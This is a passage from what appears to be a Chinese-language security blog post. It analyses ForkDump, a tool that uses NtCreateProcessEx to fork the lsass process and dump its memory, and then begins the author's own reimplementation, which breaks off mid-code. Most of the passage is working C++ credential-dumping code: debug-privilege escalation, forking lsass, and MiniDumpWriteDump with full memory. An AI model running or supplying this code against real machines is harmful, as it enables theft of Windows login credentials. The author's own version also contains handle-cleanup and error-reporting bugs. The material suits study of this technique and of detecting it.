<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">/*
</span><span style="color:#75715e"> * FORKLIB - Process Snapshotting via forking.
</span><span style="color:#75715e"> *
</span><span style="color:#75715e"> * This file is subject to the terms and conditions defined in
</span><span style="color:#75715e"> * file &#39;LICENSE&#39;, which is part of this source code package.
</span><span style="color:#75715e"> *
</span><span style="color:#75715e"> * COPYRIGHT Bill Demirkapi 2021
</span><span style="color:#75715e"> */</span>
<span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;pch.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;ForkLib.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Initialize a fork snapshot. Attempts to open a PROCESS_CREATE_PROCESS handle to the target.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e">/// &lt;param name=&#34;TargetProcessId&#34;&gt;The process ID of the target process to fork.&lt;/param&gt;
</span><span style="color:#75715e"></span>ForkSnapshot<span style="color:#f92672">::</span>ForkSnapshot (
	_In_ DWORD TargetProcessId
	)
{
	<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess <span style="color:#f92672">=</span> NULL;
	<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>TargetProcess <span style="color:#f92672">=</span> OpenProcess(PROCESS_CREATE_PROCESS, FALSE, TargetProcessId);
	<span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>TargetProcess <span style="color:#f92672">==</span> NULL)
	{
		DBGPRINT(<span style="color:#e6db74">&#34;[FORKLIB] Failed to open a PROCESS_CREATE_PROCESS handle to target process %i with last error %i.&#34;</span>, TargetProcessId, GetLastError());
	}
}

<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Initialize a fork snapshot.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e">/// &lt;param name=&#34;TargetProcess&#34;&gt;The process ID of the target process to fork.&lt;/param&gt;
</span><span style="color:#75715e"></span>ForkSnapshot<span style="color:#f92672">::</span>ForkSnapshot (
	_In_ HANDLE TargetProcess
	)
{
	<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess <span style="color:#f92672">=</span> NULL;
	<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>TargetProcess <span style="color:#f92672">=</span> TargetProcess;
}

<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Deconstruct a fork snapshot. This will clean up any open snapshots.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e"></span>ForkSnapshot<span style="color:#f92672">::~</span>ForkSnapshot (
	VOID
	)
{
	<span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess <span style="color:#f92672">!=</span> NULL)
	{
		<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CleanSnapshot();
	}
}

<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Take a snapshot of the target process.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e">/// &lt;returns&gt;A PROCESS_ALL_ACCESS HANDLE to a snapshot of the target process.&lt;/returns&gt;
</span><span style="color:#75715e"></span>HANDLE
ForkSnapshot<span style="color:#f92672">::</span>TakeSnapshot (
	VOID
	)
{
	NTSTATUS status;

	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	<span style="color:#75715e">// If we have an existing snapshot process, we need to clean it up before creating another one.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	<span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess <span style="color:#f92672">!=</span> NULL)
	{
		<span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CleanSnapshot() <span style="color:#f92672">==</span> FALSE)
		{
			DBGPRINT(<span style="color:#e6db74">&#34;[FORKLIB] Failed to clean up existing snapshot before taking another one.&#34;</span>);
			<span style="color:#66d9ef">return</span> NULL;
		}
	}

	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	<span style="color:#75715e">// Attempt to create a fork of the target process.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	status <span style="color:#f92672">=</span> NtCreateProcessEx(<span style="color:#f92672">&amp;</span><span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess,
							   PROCESS_ALL_ACCESS,
							   NULL,
							   <span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>TargetProcess,
							   <span style="color:#ae81ff">0</span>,
							   NULL,
							   NULL,
							   NULL,
							   <span style="color:#ae81ff">0</span>);
	<span style="color:#66d9ef">if</span> (NT_SUCCESS(status) <span style="color:#f92672">==</span> FALSE)
	{
		DBGPRINT(<span style="color:#e6db74">&#34;[FORKLIB] Failed to create fork process with status 0x%X.&#34;</span>, status);
		<span style="color:#66d9ef">return</span> NULL;
	}

	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	<span style="color:#75715e">// If the previous call succeeded, we have created a fork/snapshot of the target process.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">// Yes, it really is that simple.
</span><span style="color:#75715e"></span>	<span style="color:#75715e">//
</span><span style="color:#75715e"></span>	<span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess;
}

<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Attempts to clean up the current snapshot by terminating the forked process.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e">/// &lt;returns&gt;TRUE if clean up successful, FALSE otherwise.&lt;/returns&gt;
</span><span style="color:#75715e"></span>BOOL
ForkSnapshot<span style="color:#f92672">::</span>CleanSnapshot (
	VOID
	)
{
	BOOL cleanSuccess;

	cleanSuccess <span style="color:#f92672">=</span> TRUE;

	<span style="color:#66d9ef">if</span> (<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess)
	{
		cleanSuccess <span style="color:#f92672">=</span> TerminateProcess(<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess, <span style="color:#ae81ff">0</span>);
		CloseHandle(<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess);
		<span style="color:#66d9ef">if</span> (cleanSuccess <span style="color:#f92672">==</span> FALSE)
		{
			DBGPRINT(<span style="color:#e6db74">&#34;[FORKLIB] Failed to terminate process with last error %i.&#34;</span>, GetLastError());
		}
		<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess <span style="color:#f92672">=</span> NULL;
	}
	
	<span style="color:#66d9ef">return</span> cleanSuccess;
}
</code></pre></div><p>这个cpp就是实现了头文件的功能</p>
<p>首先是一个构造方法，传入目标的PID；初始化fork快照，然后打开目标进程，如果没有成功打开就输出下错误信息</p>
<p>然后重写了方法，如果直接传了一个进程句柄，就把本类里未定义的TargetProcess赋值一下</p>
<p>析构函数就是调用<code>CleanSnapshot</code>，清空fork快照</p>
<p>然后就是<code>TakeSnapshot</code>函数，首先判断是否有<code>CurrentSnapshotProcess</code>，如果有就清空返回了。没有就创建一个进程</p>
<p><strong>这里我们创建的进程是lsass的目标句柄，将创建远程进程的分支</strong>（这里也就是fork）</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">NtCreateProcessEx(<span style="color:#f92672">&amp;</span><span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>CurrentSnapshotProcess,PROCESS_ALL_ACCESS,NULL,<span style="color:#66d9ef">this</span><span style="color:#f92672">-&gt;</span>TargetProcess,<span style="color:#ae81ff">0</span>,NULL,NULL,NULL,<span style="color:#ae81ff">0</span>);
</code></pre></div><p><code>CurrentSnapshotProcess</code>是句柄，<code>TargetProcess</code>是PID，然后判断是否打开，没打开就输出debug信息，打开了就返回句柄。</p>
<p>这个主文件里最后一个函数就是<code>CleanSnapshot</code>了，就是用来清空快照的</p>
<p>判断是否<code>CurrentSnapshotProcess</code>有没有，有就调用<code>TerminateProcess</code>来终止指定进程及其所有线程，如果没终止成功就输出debug信息，最后强制把<code>CurrentSnapshotProcess赋值</code>为NULL</p>
<p>到这里ForkLib这个文件夹内的内容就分析完了</p>
<h3 id="forkdump">ForkDump</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">//
</span><span style="color:#75715e">// ForkDump
</span><span style="color:#75715e">// Dump the memory of a given process with a Process Forking attack.
</span><span style="color:#75715e">// 
</span><span style="color:#75715e">// COPYRIGHT Bill Demirkapi 2021. All Rights Reserved.
</span><span style="color:#75715e">//
</span><span style="color:#75715e"></span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Windows.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;cstdio&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;ForkLib.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Dbghelp.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#75715e">#pragma comment (lib, &#34;Dbghelp.lib&#34;)
</span><span style="color:#75715e">#pragma comment (lib, &#34;ForkLib.lib&#34;)
</span><span style="color:#75715e"></span>
<span style="color:#75715e">/// &lt;summary&gt;
</span><span style="color:#75715e">/// Escalate the current processes&#39; debug privileges.
</span><span style="color:#75715e">/// &lt;/summary&gt;
</span><span style="color:#75715e">/// &lt;returns&gt;TRUE if debug privilege enabled, FALSE otherwise.&lt;/returns&gt;
</span><span style="color:#75715e"></span>BOOL
<span style="color:#a6e22e">EscalateDebugPrivilege</span> (
    VOID
    )
{
    BOOL result;
    HANDLE currentToken;
    LUID currentDebugValue;
    TOKEN_PRIVILEGES newTokenPrivilege;

    result <span style="color:#f92672">=</span> FALSE;
    currentToken <span style="color:#f92672">=</span> NULL;

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Open the current processes&#39; token.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES <span style="color:#f92672">|</span> TOKEN_QUERY, <span style="color:#f92672">&amp;</span>currentToken) <span style="color:#f92672">==</span> FALSE)
    {
        printf(<span style="color:#e6db74">&#34;Failed to open the token of the current process with the last error %i.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, GetLastError());
        <span style="color:#66d9ef">goto</span> Exit;
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Lookup the LUID of the debug privilege.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, <span style="color:#f92672">&amp;</span>currentDebugValue) <span style="color:#f92672">==</span> FALSE)
    {
        printf(<span style="color:#e6db74">&#34;Failed to lookup the current debug privilege with the last error %i.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, GetLastError());
        CloseHandle(currentToken);
        <span style="color:#66d9ef">goto</span> Exit;
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Create our elevated token privilege.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    newTokenPrivilege.PrivilegeCount <span style="color:#f92672">=</span> <span style="color:#ae81ff">1</span>;
    newTokenPrivilege.Privileges[<span style="color:#ae81ff">0</span>].Luid <span style="color:#f92672">=</span> currentDebugValue;
    newTokenPrivilege.Privileges[<span style="color:#ae81ff">0</span>].Attributes <span style="color:#f92672">=</span> SE_PRIVILEGE_ENABLED;

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Adjust the current processes&#39; token.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (AdjustTokenPrivileges(currentToken, FALSE, <span style="color:#f92672">&amp;</span>newTokenPrivilege, <span style="color:#66d9ef">sizeof</span>(newTokenPrivilege), NULL, NULL) <span style="color:#f92672">==</span> FALSE <span style="color:#f92672">||</span> 
        GetLastError() <span style="color:#f92672">!=</span> ERROR_SUCCESS)
    {
        printf(<span style="color:#e6db74">&#34;Failed to adjust debug privileges with the last error %i.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, GetLastError());
        CloseHandle(currentToken);
        <span style="color:#66d9ef">goto</span> Exit;
    }

    result <span style="color:#f92672">=</span> TRUE;
Exit:
    <span style="color:#66d9ef">if</span> (currentToken)
    {
        CloseHandle(currentToken);
    }
    <span style="color:#66d9ef">return</span> result;
}

<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">int</span> argc, <span style="color:#66d9ef">char</span><span style="color:#f92672">**</span> argv)
{
    <span style="color:#66d9ef">int</span> returnCode;
    std<span style="color:#f92672">::</span>string targetProcessIdStr;
    ULONG targetProcessId;
    std<span style="color:#f92672">::</span>string dumpFileName;
    HANDLE dumpFile;
    ForkSnapshot<span style="color:#f92672">*</span> snapshot;
    HANDLE snapshotProcess;

    dumpFile <span style="color:#f92672">=</span> NULL;
    snapshotProcess <span style="color:#f92672">=</span> NULL;
    snapshot <span style="color:#f92672">=</span> NULL;
    returnCode <span style="color:#f92672">=</span> FALSE;

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Ensure we have the expected arguments.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (argc <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">3</span>)
    {
        printf(<span style="color:#e6db74">&#34;ForkDump.exe [dump file name] [target process ID]</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
        <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Retrieve and parse the arguments.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    dumpFileName <span style="color:#f92672">=</span> argv[<span style="color:#ae81ff">1</span>];
    targetProcessIdStr <span style="color:#f92672">=</span> argv[<span style="color:#ae81ff">2</span>];
    targetProcessId <span style="color:#f92672">=</span> std<span style="color:#f92672">::</span>stoi(targetProcessIdStr);

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Create the dump file.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    dumpFile <span style="color:#f92672">=</span> CreateFileA(dumpFileName.c_str(), GENERIC_ALL, <span style="color:#ae81ff">0</span>, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    <span style="color:#66d9ef">if</span> (dumpFile <span style="color:#f92672">==</span> INVALID_HANDLE_VALUE)
    {
        printf(<span style="color:#e6db74">&#34;Failed to open dump file %s with the last error %i.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, dumpFileName.c_str(), GetLastError());
        <span style="color:#66d9ef">goto</span> Exit;
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Create a fork snapshot of the target.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    snapshot <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> ForkSnapshot(targetProcessId);
    snapshotProcess <span style="color:#f92672">=</span> snapshot<span style="color:#f92672">-&gt;</span>TakeSnapshot();
    <span style="color:#66d9ef">if</span> (snapshotProcess <span style="color:#f92672">==</span> NULL)
    {
        <span style="color:#75715e">//
</span><span style="color:#75715e"></span>        <span style="color:#75715e">// If our first try fails, attempt to escalate our debug privilege.
</span><span style="color:#75715e"></span>        <span style="color:#75715e">//
</span><span style="color:#75715e"></span>        printf(<span style="color:#e6db74">&#34;Failed to take a snapshot of the target process. Attempting to escalate debug privilege...</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
        <span style="color:#66d9ef">if</span> (EscalateDebugPrivilege() <span style="color:#f92672">==</span> FALSE)
        {
            printf(<span style="color:#e6db74">&#34;Failed to escalate debug privileges, are you running ForkDump as Administrator?</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
            <span style="color:#66d9ef">goto</span> Exit;
        }

        <span style="color:#75715e">//
</span><span style="color:#75715e"></span>        <span style="color:#75715e">// Retry with debug privileges.
</span><span style="color:#75715e"></span>        <span style="color:#75715e">//
</span><span style="color:#75715e"></span>        printf(<span style="color:#e6db74">&#34;Escalated debug privileges, attempting to take another snapshot.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
        snapshot<span style="color:#f92672">-&gt;</span>CleanSnapshot();
        <span style="color:#66d9ef">delete</span> snapshot;
        snapshot <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> ForkSnapshot(targetProcessId);
        snapshotProcess <span style="color:#f92672">=</span> snapshot<span style="color:#f92672">-&gt;</span>TakeSnapshot();
        <span style="color:#66d9ef">if</span> (snapshotProcess <span style="color:#f92672">==</span> NULL)
        {
            <span style="color:#75715e">//
</span><span style="color:#75715e"></span>            <span style="color:#75715e">// If we failed once again, this likely means that there is a difference in process privileges or the handle was stripped.
</span><span style="color:#75715e"></span>            <span style="color:#75715e">//
</span><span style="color:#75715e"></span>            printf(<span style="color:#e6db74">&#34;Second attempt at taking a snapshot of the target failed. It is likely that there is a difference in process privilege or the handle was stripped.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
            <span style="color:#66d9ef">goto</span> Exit;
        }
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Create a dump of the forked process.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (MiniDumpWriteDump(snapshotProcess, GetProcessId(snapshotProcess), dumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL) <span style="color:#f92672">==</span> FALSE)
    {
        printf(<span style="color:#e6db74">&#34;Failed to create a dump of the forked process with the last error %i.</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, GetLastError());
        <span style="color:#66d9ef">goto</span> Exit;
    }

    returnCode <span style="color:#f92672">=</span> TRUE;
    printf(<span style="color:#e6db74">&#34;Successfully dumped process %i to %s!</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>, targetProcessId, dumpFileName.c_str());
Exit:
    <span style="color:#66d9ef">if</span> (dumpFile <span style="color:#f92672">!=</span> INVALID_HANDLE_VALUE)
    {
        CloseHandle(dumpFile);
    }
    <span style="color:#66d9ef">if</span> (snapshot <span style="color:#f92672">!=</span> NULL)
    {
        snapshot<span style="color:#f92672">-&gt;</span>CleanSnapshot();
        <span style="color:#66d9ef">delete</span> snapshot;
    }
    <span style="color:#66d9ef">return</span> returnCode;
}
</code></pre></div><p><code>EscalateDebugPrivilege</code>没啥好说的 提升权限的函数，也可以用<code>RtlAdjustPrivilege</code>进行提权</p>
<p>然后看下main函数</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">	<span style="color:#66d9ef">int</span> returnCode;
    std<span style="color:#f92672">::</span>string targetProcessIdStr;
    ULONG targetProcessId;
    std<span style="color:#f92672">::</span>string dumpFileName;
    HANDLE dumpFile;
    ForkSnapshot<span style="color:#f92672">*</span> snapshot;
    HANDLE snapshotProcess;

    dumpFile <span style="color:#f92672">=</span> NULL;
    snapshotProcess <span style="color:#f92672">=</span> NULL;
    snapshot <span style="color:#f92672">=</span> NULL;
    returnCode <span style="color:#f92672">=</span> FALSE;

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Ensure we have the expected arguments.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">if</span> (argc <span style="color:#f92672">&lt;</span> <span style="color:#ae81ff">3</span>)
    {
        printf(<span style="color:#e6db74">&#34;ForkDump.exe [dump file name] [target process ID]</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">n&#34;</span>);
        <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
    }

    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    <span style="color:#75715e">// Retrieve and parse the arguments.
</span><span style="color:#75715e"></span>    <span style="color:#75715e">//
</span><span style="color:#75715e"></span>    dumpFileName <span style="color:#f92672">=</span> argv[<span style="color:#ae81ff">1</span>];
    targetProcessIdStr <span style="color:#f92672">=</span> argv[<span style="color:#ae81ff">2</span>];
    targetProcessId <span style="color:#f92672">=</span> std<span style="color:#f92672">::</span>stoi(targetProcessIdStr);
</code></pre></div><p>我觉得这几个应该就不用说了，主要看功能</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++">dumpFile <span style="color:#f92672">=</span> CreateFileA(dumpFileName.c_str(), GENERIC_ALL, <span style="color:#ae81ff">0</span>, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
</code></pre></div><p>先打开一个文件，用于我们写入dump后的内存，然后就是判断是否打开</p>
<p><code>snapshot = new ForkSnapshot(targetProcessId);</code>，这个就是调用了<code>ForkSnapshot</code>的构造方法 然后打开这个进程</p>
<p><code>snapshotProcess = snapshot-&gt;TakeSnapshot();</code>然后调用这个函数，把用<code>NtCreateProcessEx</code>打开后的句柄赋值给<code>snapshotProcess</code></p>
<p>然后判断句柄的情况，如果不行就找问题，有权限不足？然后如果提权成功了就再次走一圈上面那行，如果还不行就直接退出了</p>
<p>如果打开成功了，就要开始dump内存了；前三个参数就是句柄，id，输出文件；如果dump成功就输出个sucess就完事了</p>
<p>一个工具就这么分析完了</p>
<p>接下来 我想手动实现下 感觉也不难</p>
<p>先使用下GitHub-release里自带的工具</p>
<p><img src="/images/Use%20fork%20dump%20lsass/image-20220219204657157.png" alt="image-20220219204657157"></p>
<blockquote>
<p>确实可以 然后开始自写</p>
</blockquote>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-cpp" data-lang="cpp"><span style="color:#75715e">#pragma once
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Windows.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;Dbghelp.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#pragma comment(lib, &#34;ntdll.lib&#34;)
</span><span style="color:#75715e">#pragma comment(lib,&#34;Dbghelp.lib&#34;)
</span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#a6e22e">NTSTATUS</span>(WINAPI<span style="color:#f92672">*</span> _RtlAdjustPrivilege)(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

<span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_UNICODE_STRING</span> {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, <span style="color:#f92672">*</span> PUNICODE_STRING;

<span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#a6e22e">_OBJECT_ATTRIBUTES</span>
{
    ULONG Length;
    PVOID RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, <span style="color:#f92672">*</span> POBJECT_ATTRIBUTES;

<span style="color:#66d9ef">typedef</span> <span style="color:#a6e22e">NTSTATUS</span>(NTAPI<span style="color:#f92672">*</span> fpNtCreateProcessEx)
(
    OUT PHANDLE     ProcessHandle,
    IN ACCESS_MASK  DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes  OPTIONAL,
    IN HANDLE   ParentProcess,
    IN ULONG    Flags,
    IN HANDLE SectionHandle     OPTIONAL,
    IN HANDLE DebugPort     OPTIONAL,
    IN HANDLE ExceptionPort     OPTIONAL,
    IN BOOLEAN  InJob
);
</code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c++" data-lang="c++"><span style="color:#75715e">#include</span> <span style="color:#75715e">&#34;pch.h&#34;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">void</span> <span style="color:#a6e22e">Clean</span>(HANDLE processHandle, HANDLE lsassHandle, HANDLE dumpFile) {
	processHandle <span style="color:#f92672">=</span> NULL;
	CloseHandle(processHandle);
	lsassHandle <span style="color:#f92672">=</span> NULL;
	CloseHandle(lsassHandle);
	dumpFile <span style="color:#f92672">=</span> NULL;
	CloseHandle(dumpFile);
}

<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">int</span> argc,<span style="color:#66d9ef">char</span><span style="color:#f92672">*</span> argv[]) {
	ULONG t <span style="color:#f92672">=</span> NULL;
	_RtlAdjustPrivilege RtlAdjustPrivilege;
	RtlAdjustPrivilege <span style="color:#f92672">=</span> (_RtlAdjustPrivilege)GetProcAddress(LoadLibraryA(<span style="color:#e6db74">&#34;ntdll.dll&#34;</span>), <span style="color:#e6db74">&#34;RtlAdjustPrivilege&#34;</span>);

	HANDLE processHandle <span style="color:#f92672">=</span> NULL;
	HANDLE lsassHandle <span style="color:#f92672">=</span> NULL;
	HANDLE dumpFile <span style="color:#f92672">=</span> NULL;
	<span style="color:#66d9ef">if</span> (argc<span style="color:#f92672">!=</span><span style="color:#ae81ff">3</span>)
	{
		printf(<span style="color:#e6db74">&#34;fork-dump-lsass.exe [dump file name] [target process ID]</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>);
		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
	}

	<span style="color:#66d9ef">char</span><span style="color:#f92672">*</span> dumpFileName <span style="color:#f92672">=</span> argv[<span style="color:#ae81ff">1</span>];
	<span style="color:#66d9ef">int</span> pid <span style="color:#f92672">=</span> atoi(argv[<span style="color:#ae81ff">2</span>]);
	dumpFile <span style="color:#f92672">=</span> CreateFileA(dumpFileName, GENERIC_ALL, <span style="color:#ae81ff">0</span>, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	<span style="color:#66d9ef">if</span> (dumpFile <span style="color:#f92672">==</span> INVALID_HANDLE_VALUE)
	{
		printf(<span style="color:#e6db74">&#34;CreateFile Failed: %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>,GetLastError);
		Clean(processHandle, lsassHandle, lsassHandle);
		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
	}

	RtlAdjustPrivilege(<span style="color:#ae81ff">20</span>, TRUE, FALSE, <span style="color:#f92672">&amp;</span>t);
	lsassHandle <span style="color:#f92672">=</span> OpenProcess(PROCESS_CREATE_PROCESS, FALSE, pid);
	fpNtCreateProcessEx _NtCreateProcessEx <span style="color:#f92672">=</span> (fpNtCreateProcessEx)GetProcAddress(LoadLibraryA(<span style="color:#e6db74">&#34;ntdll.dll&#34;</span>), <span style="color:#e6db74">&#34;NtCreateProcessEx&#34;</span>);
	NTSTATUS status <span style="color:#f92672">=</span> _NtCreateProcessEx(<span style="color:#f92672">&amp;</span>processHandle,PROCESS_ALL_ACCESS,NULL, lsassHandle,<span style="color:#ae81ff">0</span>,NULL,NULL,NULL,<span style="color:#ae81ff">0</span>);
	<span style="color:#66d9ef">if</span> (status <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0x00000000</span>)
	{
		printf(<span style="color:#e6db74">&#34;NtCreateProcessEx Failed: %d</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, GetLastError());
		Clean(processHandle, lsassHandle, lsassHandle);
		<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
	}

	<span style="color:#66d9ef">if</span> (MiniDumpWriteDump(processHandle, GetProcessId(processHandle), dumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL) <span style="color:#f92672">==</span> FALSE)
	{
